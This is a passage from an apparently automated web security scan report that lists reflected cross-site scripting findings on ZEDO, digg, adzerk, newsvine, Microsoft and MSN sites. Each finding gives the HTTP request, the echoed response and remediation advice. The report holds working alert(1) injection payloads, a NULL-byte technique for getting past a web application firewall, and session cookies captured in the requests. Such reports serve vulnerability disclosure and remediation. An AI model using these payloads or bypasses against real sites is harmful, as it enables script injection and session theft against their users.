HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1394:7b448';alert(1)//a06e2db3d7d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=138 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:43 GMT Connection: close Content-Length: 3404
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat=',7b448';alert(1)//a06e2db3d7d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,7b448';alert(1)//a06e2db3d7d;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a54da"%3balert(1)//9ae9a9f14f3 was submitted in the $ parameter. This input was echoed as a54da";alert(1)//9ae9a9f14f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1394:a54da";alert(1)//9ae9a9f14f3;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=138 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:43 GMT Connection: close Content-Length: 3404
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat=',a54da";alert(1)//9ae9a9f14f3';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a54da";alert(1)//9ae9a9f14f3;z="+Math.random();}
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b4e'%3balert(1)//c10e308a487 was submitted in the l parameter. This input was echoed as 44b4e';alert(1)//c10e308a487 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=137 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:44 GMT Connection: close Content-Length: 3401
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='';var zzCusto ...[SNIP]... %3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D6%3Bf%3D1067550%3Bh%3D1067546%3Bk=http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=44b4e';alert(1)//c10e308a487http://svtrk.com/vtrk/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=ROS" TARGET="_blank" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage(\'Image1\',\' ...[SNIP]...
5.185. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/bar/v16-401/d3/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec49'-alert(1)-'d75dcf13764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?8ec49'-alert(1)-'d75dcf13764=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:3:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=420 Expires: Sun, 30 Jan 2011 02:15:07 GMT Date: Sun, 30 Jan 2011 02:08:07 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d122"%3balert(1)//d7d071229a8 was submitted in the q parameter. This input was echoed as 7d122";alert(1)//d7d071229a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=139 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:42 GMT Connection: close Content-Length: 3401
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='7d122";alert(1)//d7d071229a8';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=7d122";alert(1)//d7d071229a8;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f156'%3balert(1)//bd15349bb1d was submitted in the q parameter. This input was echoed as 6f156';alert(1)//bd15349bb1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=139 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:42 GMT Connection: close Content-Length: 3401
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='6f156';alert(1)//bd15349bb1d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=6f156';alert(1)//bd15349bb1d;z="+Math.random();}
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008c368"><script>alert(1)</script>5d52155c97c was submitted in the REST URL parameter 1. This input was echoed as 8c368"><script>alert(1)</script>5d52155c97c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search%008c368"><script>alert(1)</script>5d52155c97c HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270"><script>alert(1)</script>1a31a3f7248 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:45:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3306c"><script>alert(1)</script>4eac73ea4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:45:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dba"><script>alert(1)</script>b9c1e9ca4ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:46:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69611'-alert(1)-'c3bf7d1437a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like69611'-alert(1)-'c3bf7d1437a HTTP/1.1 Host: engine2.adzerk.net Proxy-Connection: keep-alive Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 30 Jan 2011 15:14:53 GMT Server: Microsoft-IIS/6.0 Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 2022 Connection: keep-alive
function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe ...[SNIP]... <a href="http://engine.adzerk.net/redirect/0/2564/2444/8277/a03a4092904040e18e901a243e653d5f/43/1178/2288/634319972937586141?keywords=php%2cfacebook%2ciframe%2cfacebook-like69611'-alert(1)-'c3bf7d1437a" rel="nofollow" target="_blank" title=""> ...[SNIP]...
5.193. http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://helenaspopkin.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5470"-alert(1)-"2158d48b318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e5470"-alert(1)-"2158d48b318=1 HTTP/1.1 Host: helenaspopkin.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:53:12 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=f02f9cb34b8692be67ae217ef748e81a; expires=Sat, 25-Jan-2031 17:53:12 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 92187
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
5.194. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i4.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c8a70<img%20src%3da%20onerror%3dalert(1)>1469ac780f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8a70<img src=a onerror=alert(1)>1469ac780f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12733 Content-Type: application/x-javascript ETag: 7f87e1784ee58de46a57500030b11c25 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB29 Cache-Control: public, max-age=43200 Expires: Mon, 31 Jan 2011 02:59:00 GMT Date: Sun, 30 Jan 2011 14:59:00 GMT Connection: close Vary: Accept-Encoding Content-Length: 12733
if (typeof epx_core === 'undefined') { epx_loaded = false; epx_core = function(s) {this.s = s;} epx_core.prototype = { exec: function(func, checkFunc, retry) { if (retry) retry++; else retry = ...[SNIP]... on(){new epx_searchBox({"allowEmptySearch":true,"appId":"1000","boxId":"searchBox","btnId":"submitSearch","focusOnInit":true,"maxTerms":null,"minimumTermLength":3,"paramsCallback":null,"queryParams":"&c8a70<img src=a onerror=alert(1)>1469ac780f8=1","scopeId":"1","searchLocation":"\/site\/search","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search all projects"}} ).init();});}, function ...[SNIP]...
5.195. http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ingame.msnbc.msn.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46847"><script>alert(1)</script>138d2fa70ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46847"><script>alert(1)</script>138d2fa70ec=1 HTTP/1.1 Host: ingame.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:08:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 124933
The value of the Symbol request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b72"%3balert(1)//2badde9cef5 was submitted in the Symbol parameter. This input was echoed as 22b72";alert(1)//2badde9cef5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investments/charts?Symbol=indu22b72"%3balert(1)//2badde9cef5 HTTP/1.1 Host: investing.money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 02:08:35 GMT Content-Length: 49749 Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 56c3d<script>alert(1)</script>22dd092b040 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 was submitted in the returnurl parameter. This input was echoed as 981cd"style="x:expression(alert(1))"27f64f44305 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1 Host: login.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 13452 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=f4wmfx55nhab5r55g0gog145; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:50 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Sign I ...[SNIP]... <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305"> ...[SNIP]...
The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7547a"style%3d"x%3aexpression(alert(1))"d77e1fb43b1f1de96 was submitted in the returnurl parameter. This input was echoed as 7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:36:19 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:19 GMT Content-Length: 15704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> The Of ...[SNIP]... <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96"> ...[SNIP]...
5.200. http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://michaelwann.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96b9"-alert(1)-"5a6f605e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d96b9"-alert(1)-"5a6f605e0b4=1 HTTP/1.1 Host: michaelwann.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:55:56 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=6d2f3fb611f44e2c7adec971945fc305; expires=Sat, 25-Jan-2031 17:55:56 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 46201
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 5173f%20style%3dx%3aexpression(alert(1))%20871257c1879 was submitted in the symbol parameter. This input was echoed as 5173f style=x:expression(alert(1)) 871257c1879 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 14e81%20style%3dx%3aexpression(alert(1))%209197df0cd41 was submitted in the symbol parameter. This input was echoed as 14e81 style=x:expression(alert(1)) 9197df0cd41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
